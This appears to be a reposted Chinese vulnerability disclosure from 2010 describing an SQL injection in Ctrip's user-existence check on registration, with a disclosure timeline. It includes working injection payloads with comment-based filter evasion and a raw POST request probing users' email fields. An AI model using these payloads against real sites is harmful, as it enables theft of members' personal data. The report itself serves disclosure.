携程网某ajax验证存在sql注入

漏洞详情披露状态：2010-07-30：细节已通知厂商并且等待厂商处理中2010-07-30：厂商已经确认，细节仅向厂商公开2010-08-09：细节向核心白帽子及相关领域专家公开2010-08-19：细节向普通白帽子公开2010-08-29：细节向实习白帽子公开2010-08-29：细节向公众公开简要描述：位置较敏感，发生在members表，可以发现表的一些字段，能够窃取任何人的包括

Sword-heart

4744人浏览 · 2022-04-17 10:43:31

Sword-heart · 2022-04-17 10:43:31 发布

漏洞详情

披露状态：

2010-07-30：细节已通知厂商并且等待厂商处理中
2010-07-30：厂商已经确认，细节仅向厂商公开
2010-08-09：细节向核心白帽子及相关领域专家公开
2010-08-19：细节向普通白帽子公开
2010-08-29：细节向实习白帽子公开
2010-08-29：细节向公众公开

简要描述：

位置较敏感，发生在members表，可以发现表的一些字段，能够窃取任何人的包括email等信息，未深入测试

详细说明：

用户注册时，"验证用户是否存在"因过滤不严谨导致sql注入
另外：
http://www.ctrip.com/robots.txt
http://destguides.ctrip.com/destguides/journals/AllSingleJournals.aspx?Writing=130079%27%273
暴露了敏感信息

漏洞证明：

http://www.ctrip.com/member/CheckUser.asp
post: signup_uid=xyyxx1x'/**/order/**/by/**/1--
post: signup_uid=xyyxx1x'/**/order/**/by/**/uid--
post: signup_uid=xyyxx1x'/**/order/**/by/**/email--
尝试不正确的字段导致不同结果，输入".`"等字符及其它注入手段测试（可能存在ids）

POST /member/CheckUser.asp HTTP/1.1
Accept: */*
Accept-Language: en-US,zh-cn;q=0.5
Referer: http://www.ctrip.com/member/signup.asp
If-Modified-Since: Thu Jan 1 08:00:00 UTC+0800 1970
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)
Host: www.ctrip.com
Content-Length: 94
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 
signup_uid=jquery1'/*and*/and/**/sUbstRing(email,1,1)=char(0)/**/order/**/by/*and 1=1*/email--